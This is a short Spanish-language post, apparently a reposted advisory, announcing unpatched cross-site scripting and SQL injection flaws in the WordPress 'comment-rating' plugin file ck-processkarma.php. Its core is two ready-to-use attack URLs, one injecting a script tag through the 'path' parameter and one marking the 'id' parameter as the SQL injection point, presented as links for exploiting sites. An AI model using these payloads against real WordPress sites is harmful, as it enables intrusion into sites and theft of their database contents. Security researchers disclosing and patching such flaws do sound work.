Vulnerabilidad en WordPress ‘Ranking Comment’ Sql y XSS Injection
Un Xploit permite explotar distintas vulnerabilidades, no reparadas, en el plugin ‘Ranking Comment‘ para WordPress.
Los links para explotar dichas vulnerabilidades son:
/wp-content/plugins/comment-rating
/ck-prosesskarma.php?id=
La primer URL es para Cross site scripting (Xss) que nos permite inyectar codigo javascript y la segunda es una vulnerabilidad de SQL Injection.
EL archivo vulnerable es ck-processkarma.php y las inyecciones son:
Xss
http://www.webVulnerable.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
SQL injection
http://www.webVulnerable.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
El archivo original fue extraído de: Pastebin y el Autor es: The Evil Thinker